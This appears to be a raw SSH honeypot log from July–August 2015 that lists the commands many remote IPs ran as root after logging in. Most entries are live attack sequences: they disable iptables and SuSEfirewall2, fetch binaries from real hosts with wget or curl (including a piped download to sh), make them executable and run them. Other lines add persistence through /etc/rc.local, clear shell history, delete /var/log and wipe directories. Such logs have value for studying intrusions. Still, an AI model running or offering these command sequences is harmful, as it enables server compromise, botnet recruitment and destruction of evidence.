export HISTFILE=/dev/null
w
id
pwd
ls
cd Mail
ls
ls -a
d
pwd
ls /root/Mail
cd Mail
ls
pwd
cd Mail
pwd
id
ls -a
cd /root
cd .ssh
pwd

From 193.111.232.132 10-Jul-2015 21:33:41 ssh2 root
id
pwd
cd fgjfdjifijjijgeji
cd ..
ls
w
id
adduser
add
useradd
cmds
help
?
history -c
reboot

From 193.111.232.132 11-Jul-2015 02:26:45 ssh2 root
reload
2
w
server
menu

From 61.166.50.82 11-Jul-2015 05:18:15 ssh2 root
root@104.245.38.24's password: Linux localhost 2.6.32 #4 SMP Wed

From 61.166.50.82 11-Jul-2015 15:37:17 ssh2 root
uname -a
ps -e
wget
wget http://14.29.49.36:9090/yu-x

From 193.111.232.55 11-Jul-2015 21:59:01 ssh2 root
history -c -d offset
unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null
w
ps a
ps x
uname -a
cat /proc/cpuinfo
pwd
ls -a
cd .wmrc
ls -a
wget
wget safe.home.ro/muh.jpg
wget -P safe.home.ro/muh.jpg
wget -P safe.home.ro/muh.jpg -P
history -c

From 84.117.124.72 12-Jul-2015 01:56:19 ssh2 root
uname -a
ps x
cat /proc/cpuinfo
ls -a
uname -a
ifconfig
w
cd /usr/local/games
ls a
cd nsmail
ls -a
ls -all
ls -a
ls
cd ..
rm -rf *
ls -a
cd
.bash_history
cat .bash_history
cd /usr/local/games
yum
apt-get
apt-get install build-essential libssl-dev libpam-dev
apt-get install openssl-devel pam-devel
cat /etc/hosts
apt-get groupinstall "Development Tools"
apt-get install gcc
wget clubby.ucoz.com/sniff.tgz
tar zxfv sniff.tgz
rm -rf sniff.tgz
cd ip.h
./inst ceckspamroot 22
apt-get install tar
wget http://clubby.ucoz.com/sniff.tgz
wget -c http://clubby.ucoz.com/sniff.tgz
wget clubby.ucoz.com/skdet.tgz
tar zxfv skdet.tgz
rm -rf skdet.tgz
cd skdet
chmod +x *
./bleah 84.117.124.72
tar
ls -a
cat /etc/issue
ps x
ifconfig

From 84.117.124.72 12-Jul-2015 12:15:21 ssh2 root
ls -a
apt-get install upgrade

From 86.125.24.14 12-Jul-2015 22:24:21 ssh2 root
ls
perl test.pl
ls
cd /
cd
cd /
ls

From 84.117.124.72 12-Jul-2015 22:34:23 ssh2 root
curl -O
ls -a
cd ..
rm -rf *
cd ..
rm -rf *
history -c
exit

From 77.247.181.162 13-Jul-2015 08:53:25 ssh2 root
w
ps -aux
ifconfig
history
cat /proc/cpuinfo
cat /etc/issue
uname -a

From 84.117.124.72 13-Jul-2015 19:12:27 ssh2 root
w
ps x
apt-get install linux*
apt-get install debian*
ls -a
apt-get install DEbian*
apt-get update
apt-get install update
apt-get install Debian
apt-get install yum
yum
history -c
exit
wget
history
cat /etc/issue
wget -c ircdu.6te.net/g.tgz

From 27.255.81.38 13-Jul-2015 22:49:41 ssh2 root
ps -ef
wget http://117.18.4.70:7777/ttfacai chmod +x ttfacai ./ttfacai chattr +i
ps -ef

From 27.255.83.177 14-Jul-2015 18:21:57 ssh2 root
ps -ef
passwd

From 112.114.14.205 16-Jul-2015 09:06:39 ssh2 root
uname -a
ps -e

From 49.64.229.238 18-Jul-2015 10:17:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:9981/s25;chmod 777 s25;./s25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.28.206.48:9981/s25
chmod 777 s25
./s25

From 117.60.215.27 19-Jul-2015 10:42:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:10591/140;chmod 777 140;./140;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.28.206.48:10591/140
chmod 777 140
./140

From 117.60.215.27 19-Jul-2015 15:35:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:10591/s25;chmod 777 s25;./s25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.28.206.48:10591/s25
chmod 777 s25
./s25

From 91.214.169.69 19-Jul-2015 19:38:55 ssh2 root
w
cat /etc/issue
yum
gcc
cd /tmp
wget d0s.cc/fix
curl -O d0s.cc/fix

From 222.186.3.179 20-Jul-2015 01:21:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:10591/2897;chmod 777 2897;./2897;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.28.206.48:10591/2897
chmod 777 2897
./2897

From 222.186.21.14 20-Jul-2015 06:14:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.14:8080/135;chmod 777 135;./135;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.14:8080/135
chmod 777 135
./135

From 211.143.31.139 21-Jul-2015 02:36:01 ssh2 root
Exec wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>&1 &
wget -qO - http://104.199.135.124/bbsh | sh > /dev/null

From 213.152.161.10 21-Jul-2015 23:14:05 ssh2 root
w
cat /etc/issue
yum

From 118.193.232.16 22-Jul-2015 02:12:21 ssh2 root
passwd
dsfdhjlkljkjhghfgdfdgjhkfdgfhghfgfg
passwd
dsfdhjlkljkjhghfgdfdgjhkfdgfhghfgfgps -ef
ps -ef
passwd

From 178.20.152.151 23-Jul-2015 07:30:45 ssh2 root
w
ps x
uname -a
ls -a
ifconfig
wget
wget http://bali.do.am/c.jpg
cd
perl
yum install perl
apt-get install perl
perl
wget
uname -a

From 94.217.47.41 23-Jul-2015 12:23:49 ssh2 root
history -c
exit

From 222.186.26.174 23-Jul-2015 14:08:43 ssh2 root
cd .ssh
ls -a
vi known_hosts
ifconfig
ethtool eth0
cd /bin
wget http://199.83.94.136:6555/kil
curl -O http://199.83.94.136:6555/kil
wget http://199.83.94.136:6555/kil
wget -s http://199.83.94.136:6555/kil

From 178.20.152.151 23-Jul-2015 17:16:53 ssh2 root
ps x
rebote
ps x
ls -a
curl -O
exit

From 58.221.44.81 24-Jul-2015 03:03:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://58.221.44.81:9993/as1.0;chmod 777 as1.0;./as1.0;echo "cd /tmp/">>/etc/rc.local;echo "./as1.0&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://58.221.44.81:9993/as1.0
chmod 777 as1.0
./as1.0
echo "cd /tmp/">>/etc/rc.local
echo "./as1.0&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 96.254.141.18 24-Jul-2015 13:08:17 ssh2 root
uname -a
uptime
uname -a
wget
wget cross-panel.tk/scan/y.txtwget cross-panel.tk/scan/y.txt
wget cross-panel.tk/scan/y.txt
-c
[-c

From 222.186.56.120 24-Jul-2015 22:35:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:3128/145;chmod 777 145;./145;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.28.206.48:3128/145
chmod 777 145
./145

From 64.71.79.121 25-Jul-2015 13:14:29 ssh2 root
wget http://111.74.239.61:8282/260

From 103.20.249.191 26-Jul-2015 13:39:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.20.249.191:5198/rwd;chmod 777 rwd;./rwd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.20.249.191:5198/rwd
chmod 777 rwd
./rwd

From 103.39.79.93 26-Jul-2015 16:43:27 ssh2 root
uname -a ps -ef
ps -ef

From 79.126.142.55 28-Jul-2015 14:30:29 ssh2 root
uptime
uname a-

From 222.186.58.79 29-Jul-2015 10:02:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.79:7781/Linu8;chmod 777 Linu8;./Linu8;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.58.79:7781/Linu8
chmod 777 Linu8
./Linu8

From 199.217.118.155 31-Jul-2015 06:00:21 ssh2 root
Exec /var/.udp/.z1 & /var/.udp/.z2 & /var/.udp/.z3 & /var/.udp/.z4 & /var/.udp/.z5 & /var/.udp/.z6 & /var/.udp/.z7 & /var/.udp/.z8 & /var/.udp/.z9 & /var/.udp/.z10 & /var/.udp/.z11 & /var/.udp/.z12 ; rm -rf /var/log/* ; rm -rf /root/.bash_history
/var/.udp/.z1 & /var/.udp/.z2 & /var/.udp/.z3 & /var/.udp/.z4 &
rm -rf /var/log/*
rm -rf /root/.bash_history

From 209.239.123.82 31-Jul-2015 10:53:25 ssh2 root
Exec /sbin/ifconfig
/sbin/ifconfig

From 88.85.253.230  3-Aug-2015 02:23:17 ssh2 root
uname -a
ifconfig
wget
sudo
apt-get
apt-get update
sudo su
uname -L
uname -a
ifconfig
exit

From 95.218.1.156  3-Aug-2015 07:16:21 ssh2 root
sudo chmod 775 auth.log
uname -a
adduser
exit

From 184.107.237.98  3-Aug-2015 12:09:25 ssh2 root
Exec wget ftp://ftp.ugotownedz.org/Xorg -O /tmp/Xorg;wget ftp://ftp.ugotownedz.org/Xorg -O /tmp/Xorg;curl -o /tmp/Xorg ftp://ftp.ugotownedz.org/Xorg;GET ftp://ftp.ugotownedz.org/Xorg;fetch ftp://ftp.ugotownedz.org/Xorg;lwp-download ftp://ftp.ugotownedz.org/Xorg;chmod +x /tmp/Xorg;chmod +x Xorg;perl /tmp/Xorg;rm -rf /tmp/Xorg*;rm -rf Xorg*;wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh;wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh;curl -o /tmp/upfile2.sh ftp://ftp.ugotownedz.org/upfile2.sh;GET ftp://ftp.ugotownedz.org/upfile2.sh;fetch ftp://ftp.ugotownedz.org/upfile2.sh;lwp-download ftp://ftp.ugotownedz.org/upfile2.sh;chmod +x /tmp/upfile2.sh;chmod +x upfile2.sh;sh /tmp/upfile2.sh ftp.ugotownedz.org ;rm -rf /tmp/upfile2.sh*;rm -rf upfile2.sh*;wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2;wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2;curl -o /tmp/decriss2 ftp://ftp.ugotownedz.org/decriss2;GET ftp://ftp.ugotownedz.org/decriss2;fetch ftp://ftp.ugotownedz.org/decriss2;lwp-download ftp://ftp.ugotownedz.org/decriss2;chmod +x /tmp/decriss2;chmod +x decriss2;sh /tmp/decriss2 ftp.ugotownedz.org ;rm -rf /tmp/decriss2*;rm -rf decriss2*; rm -rf /root/.bash_history; rm -rf /var/log/*
wget ftp://ftp.ugotownedz.org/Xorg -O /tmp/Xorg
curl -o /tmp/Xorg ftp://ftp.ugotownedz.org/Xorg
GET ftp://ftp.ugotownedz.org/Xorg
fetch ftp://ftp.ugotownedz.org/Xorg
lwp-download ftp://ftp.ugotownedz.org/Xorg
chmod +x /tmp/Xorg
chmod +x Xorg
perl /tmp/Xorg
rm -rf /tmp/Xorg*
rm -rf Xorg*
wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh
curl -o /tmp/upfile2.sh ftp://ftp.ugotownedz.org/upfile2.sh
GET ftp://ftp.ugotownedz.org/upfile2.sh
fetch ftp://ftp.ugotownedz.org/upfile2.sh
lwp-download ftp://ftp.ugotownedz.org/upfile2.sh
chmod +x /tmp/upfile2.sh
chmod +x upfile2.sh
sh /tmp/upfile2.sh ftp.ugotownedz.org
rm -rf /tmp/upfile2.sh*
rm -rf upfile2.sh*
wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2
curl -o /tmp/decriss2 ftp://ftp.ugotownedz.org/decriss2
GET ftp://ftp.ugotownedz.org/decriss2
fetch ftp://ftp.ugotownedz.org/decriss2
lwp-download ftp://ftp.ugotownedz.org/decriss2
chmod +x /tmp/decriss2
chmod +x decriss2
sh /tmp/decriss2 ftp.ugotownedz.org
rm -rf /tmp/decriss2*
rm -rf decriss2*
rm -rf /root/.bash_history
rm -rf /var/log/*

From 14.215.113.212  6-Aug-2015 00:20:15 ssh2 root
Exec cd /var
cd /var

From 42.115.118.143  6-Aug-2015 20:58:19 ssh2 root
Exec ls -an
ls -an

From 115.144.166.165  7-Aug-2015 17:36:23 ssh2 root
ps -ef
ls

From 62.201.215.146  7-Aug-2015 23:36:53 ssh2 root
ls
nano tst.pl
yum install nano
apt-get install nano
clear
cd
ls
nano tst.pl

From 83.110.107.122  8-Aug-2015 04:29:57 ssh2 root
cd ..
ls
cd ..
ls
cd /var/tmp
ls
cd
ls
exot
exit

From 93.190.139.152 10-Aug-2015 17:49:37 ssh2 root
Exec cat /etc/issue ; cat /etc/centos-release ; uname -a ; echo === ; cat /proc/cpuinfo | grep "model name" ; echo === ; ifconfig ; echo === ; echo === ; gcc ; df -h
cat /etc/issue
cat /etc/centos-release
uname -a
echo ===
cat /proc/cpuinfo | grep "model name"
echo ===
ifconfig
echo ===
gcc
df -h

From 115.28.206.48 10-Aug-2015 19:59:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:8080/2897;chmod 777 2897;./2897;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.28.206.48:8080/2897
chmod 777 2897
./2897

From 82.146.61.32 11-Aug-2015 04:08:39 ssh2 root
Exec busybox
busybox

From 82.146.61.32 11-Aug-2015 14:27:41 ssh2 root
Exec echo "nameserver 8.8.8.8" > /etc/resolv.conf
echo "nameserver 8.8.8.8" > /etc/resolv.conf

From 81.28.96.74 12-Aug-2015 20:50:29 ssh2 root
ls
ls -a
yum install -y centos-release-SCL
yum install -y python27
apt-get install python27
ls
cd /
ls
cd /
ls

From 81.28.96.74 13-Aug-2015 01:43:33 ssh2 root
cd /
ls
cd root
ls
cd /
cd user
ls
cd python
ls
cd python27
ls

From 81.196.243.142 13-Aug-2015 06:36:37 ssh2 root
ls
ls -a
cd /
ls -a
cd user
ls -a

From 88.85.253.230 13-Aug-2015 21:15:49 ssh2 root
uname -a
ifconfig
sudo adduser intel
adduser intel
123456
ls
help
uname -a
ifsonfig
ifconfig
apt-get
sudo
apt-get install sudo
sudo
wget
user add
adduser
sudo
apt-get update
apt-get --update
exit

From 86.120.225.207 16-Aug-2015 22:31:49 ssh2 root
ls
ssh
ls -a
w
ifconfig
sudo apt-get update -y
sudo apt-get update
apt-get install sudo
apt-get update
apt-get update -y
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get upgrade -y apt-get upgrade -y upgrade

From 122.236.240.239 18-Aug-2015 11:32:13 ssh2 root
ss
ls
cd /root
cd
ss
netstat -antp
uname -a
wget http://112.124.65.90:23456/jb
curl http://112.124.65.90:23456/jb -O /root/jb

From 192.169.180.138 19-Aug-2015 04:15:33 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;
rm -f *;

wget -c http://192.169.180.138:55678/10991fuck;
chmod 777 10991fuck;
./10991fuck;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
rm -f *
wget -c http://192.169.180.138:55678/10991fuck
chmod 777 10991fuck
./10991fuck
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 192.169.180.138 19-Aug-2015 23:47:49 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://192.169.180.138:55678/10991fuck;
chmod 777 10991fuck;
./10991fuck;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://192.169.180.138:55678/10991fuck
chmod 777 10991fuck
./10991fuck
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 180.97.220.28 20-Aug-2015 19:20:05 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://180.97.220.28:8080/wo;
chmod 777 wo;
./wo;
echo "cd /tmp/">>/etc/rc.local;
echo "./wo&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://180.97.220.28:8080/exe;
chmod 777 exe;
./exe;
echo "cd /tmp/">>/etc/rc.local;
echo "./exe&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://180.97.220.28:8080/wo
chmod 777 wo
./wo
echo "cd /tmp/">>/etc/rc.local
echo "./wo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://180.97.220.28:8080/exe
chmod 777 exe
./exe
echo "cd /tmp/">>/etc/rc.local
echo "./exe&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 192.169.180.138 21-Aug-2015 05:06:13 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://192.169.180.138:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://192.169.180.138:55678/u58595
chmod 777 u58595
./u58595
echo "cd /tmp/">>/etc/rc.local
echo "./u58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/s58595
chmod 777 s58595
./s58595
echo "cd /tmp/">>/etc/rc.local
echo "./s58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.187.239.242 21-Aug-2015 14:52:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.187.239.242:4764/syn7777;chmod 777 syn7777;./syn7777;echo "cd /tmp/">>/etc/rc.local;echo "./syn7777&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.187.239.242:4764/syn7777
chmod 777 syn7777
./syn7777
echo "cd /tmp/">>/etc/rc.local
echo "./syn7777&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 192.169.180.138 22-Aug-2015 05:31:33 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://192.169.180.138:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/10992fuck;
chmod 777 10992fuck;
./10992fuck;
echo "cd /tmp/">>/etc/rc.local;
echo "./10992fuck&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://192.169.180.138:55678/u58595
chmod 777 u58595
./u58595
echo "cd /tmp/">>/etc/rc.local
echo "./u58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/s58595
chmod 777 s58595
./s58595
echo "cd /tmp/">>/etc/rc.local
echo "./s58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/10992fuck
chmod 777 10992fuck
./10992fuck
echo "cd /tmp/">>/etc/rc.local
echo "./10992fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 192.169.180.138 22-Aug-2015 15:17:41 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://192.169.180.138:55678/monitorv3;
chmod 777 monitorv3;
./monitorv3;
echo "cd /tmp/">>/etc/rc.local;
echo "./monitorv3&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/10991fuck;
chmod 777 10991fuck;
./10991fuck;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://192.169.180.138:55678/monitorv3
chmod 777 monitorv3
./monitorv3
echo "cd /tmp/">>/etc/rc.local
echo "./monitorv3&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/u58595
chmod 777 u58595
./u58595
echo "cd /tmp/">>/etc/rc.local
echo "./u58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/s58595
chmod 777 s58595
./s58595
echo "cd /tmp/">>/etc/rc.local
echo "./s58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/10991fuck
chmod 777 10991fuck
./10991fuck
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 180.97.220.28 23-Aug-2015 10:49:57 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://180.97.220.28:8080/syn28;
chmod 777 syn28;
./syn28;
echo "cd /tmp/">>/etc/rc.local;
echo "./syn28&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://180.97.220.28:8080/udp28;
chmod 777 udp28;
./udp28;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp28&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://180.97.220.28:8080/123456;
chmod 777 123456;
./123456;
echo "cd /tmp/">>/etc/rc.local;
echo "./123456&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://180.97.220.28:8080/syn28
chmod 777 syn28
./syn28
echo "cd /tmp/">>/etc/rc.local
echo "./syn28&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://180.97.220.28:8080/udp28
chmod 777 udp28
./udp28
echo "cd /tmp/">>/etc/rc.local
echo "./udp28&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://180.97.220.28:8080/123456
chmod 777 123456
./123456
echo "cd /tmp/">>/etc/rc.local
echo "./123456&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 192.169.180.138 23-Aug-2015 20:36:05 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://192.169.180.138:55678/123456;
chmod 777 123456;
./123456;
echo "cd /tmp/">>/etc/rc.local;
echo "./123456&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/10991fuck;
chmod 777 10991fuck;
./10991fuck;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://192.169.180.138:55678/123456
chmod 777 123456
./123456
echo "cd /tmp/">>/etc/rc.local
echo "./123456&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/u58595
chmod 777 u58595
./u58595
echo "cd /tmp/">>/etc/rc.local
echo "./u58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/s58595
chmod 777 s58595
./s58595
echo "cd /tmp/">>/etc/rc.local
echo "./s58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/10991fuck
chmod 777 10991fuck
./10991fuck
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 182.40.231.171 24-Aug-2015 01:39:39 ssh2 root
ifconfig
ethtool eth0
mover
mover -tnp
mver -tnp
cd /sbin
ls -la
wget http://222.186.34.91:6513/sqlrer
wget -c http://222.186.34.91:6513/sqlrer
history -c
exit

From 192.169.180.138 24-Aug-2015 11:15:17 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;
rm -f *;

wget -c http://192.169.180.138:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://192.169.180.138:55678/10991fuck;
chmod 777 10991fuck;
./10991fuck;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
rm -f *
wget -c http://192.169.180.138:55678/u58595
chmod 777 u58595
./u58595
echo "cd /tmp/">>/etc/rc.local
echo "./u58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/s58595
chmod 777 s58595
./s58595
echo "cd /tmp/">>/etc/rc.local
echo "./s58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://192.169.180.138:55678/10991fuck
chmod 777 10991fuck
./10991fuck
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 42.242.153.101 25-Aug-2015 08:42:11 ssh2 root
wget http://125.88.186.86:3306/a-xb-a chmod 777 a-xb-a
./a-xb-a

From 42.242.153.101 25-Aug-2015 19:03:09 ssh2 root
uname -a
